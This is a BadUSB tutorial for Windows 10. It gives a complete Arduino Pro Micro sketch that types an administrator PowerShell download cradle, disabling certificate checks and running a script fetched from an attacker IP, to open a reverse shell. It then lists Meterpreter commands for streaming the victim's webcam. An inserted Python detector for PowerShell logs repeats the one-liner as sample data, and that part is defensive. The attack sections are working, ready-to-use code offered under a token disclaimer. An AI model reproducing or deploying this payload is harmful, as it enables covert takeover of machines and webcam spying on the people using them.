Statement
This article is intended only for learning and communication; do not use it for any illegal activity.
Material preparation
- One BadUSB; I used a modified Arduino Pro Micro (ATmega32U4)
- A PC running Kali Linux
- A PC running Windows 10
Kali Linux side
- Download the payload generation script
git clone https://github.com/christofersimbar/Arduino-Reverse-Shell-Generator.git
cd Arduino-Reverse-Shell-Generator
sudo ruby reverse_powershell_arduino.rb
- Enter the local IP and a custom port, then press Enter through the remaining prompts to generate the script to burn to the Arduino
- Script to burn to the Arduino (modify the IP address in the URL yourself)
#include <Keyboard.h>

void typeKey(int key) {
  Keyboard.press(key);
  delay(500);
  Keyboard.release(key);
}

void setup()
{
  Keyboard.begin();
  Keyboard.press(KEY_LEFT_GUI);
  delay(1000);
  Keyboard.press('x');
  Keyboard.releaseAll();
  delay(500);
  typeKey('a');
  delay(100);
  Keyboard.press(KEY_LEFT_ALT);
  delay(500);
  Keyboard.press('y');
  Keyboard.releaseAll();
  delay(800);
  Keyboard.print("[system.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };IEX (New-Object Net.WebClient).DownloadString('http://192.168.88.102/shell.txt')");
  typeKey(KEY_RETURN);
  Keyboard.end();
}

void loop() {}
- Burn the script to the Arduino to complete the BadUSB
Windows 10 PC side
- Insert the BadUSB; the script is executed automatically
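On the defending side, the one-liner typed by the sketch leaves a recognizable trace in PowerShell script block logging (event ID 4104). The following is an added example, not part of the original article or of the generator project: it triages script block text for the indicators visible in that one-liner. The event field names (host, script) and the sample events are constructed assumptions.

```python
import re

# Indicators taken from the one-liner in the sketch's Keyboard.print line.
INDICATORS = {
    "cert_validation_disabled": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "download_string": re.compile(
        r"New-Object\s+(System\.)?Net\.WebClient\s*\)\s*\.\s*DownloadString", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "cleartext_http_to_ip": re.compile(r"http://\d{1,3}(\.\d{1,3}){3}[/:'\"]", re.I),
}

def match_indicators(script_text):
    """Return the sorted names of all indicators found in one script block."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(script_text))

def triage(events):
    """Alert on in-memory download cradles (download + IEX in one block).

    events: iterable of dicts with 'host' and 'script' keys (assumed shape of
    an export of event ID 4104 records). Severity is 'high' when the block
    also disables certificate validation or fetches over HTTP from a bare IP.
    """
    alerts = []
    for ev in events:
        hits = match_indicators(ev["script"])
        if "download_string" in hits and "invoke_expression" in hits:
            extra = {"cert_validation_disabled", "cleartext_http_to_ip"} & set(hits)
            alerts.append((ev["host"], "high" if extra else "medium", hits))
    return alerts

# Constructed sample events; the first carries the article's one-liner.
SAMPLE_EVENTS = [
    {"host": "WS-01", "script": "[system.Net.ServicePointManager]::"
     "ServerCertificateValidationCallback = { $true };IEX (New-Object "
     "Net.WebClient).DownloadString('http://192.168.88.102/shell.txt')"},
    {"host": "WS-02", "script": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"host": "WS-03", "script": "Invoke-WebRequest https://example.com/tool.zip"
     " -OutFile tool.zip"},
    {"host": "WS-04", "script": "iex (New-Object System.Net.WebClient)."
     "DownloadString('https://example.com/install.ps1')"},
]

if __name__ == "__main__":
    for host, severity, hits in triage(SAMPLE_EVENTS):
        print(host, severity, ", ".join(hits))
```

The medium-severity case (WS-04) is a pattern some legitimate installers also use, so it is worth reviewing rather than blocking outright.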
Control the webcam of the Windows 10 PC
- Back in Kali Linux, you can see that the Windows 10 PC has connected
- Execute:
sessions -i 1
to enter the target system
- Execute:
webcam_list
to scan for available webcams
- Execute:
webcam_stream 1
to open the target's webcam No. 1
- The result can be observed in the browser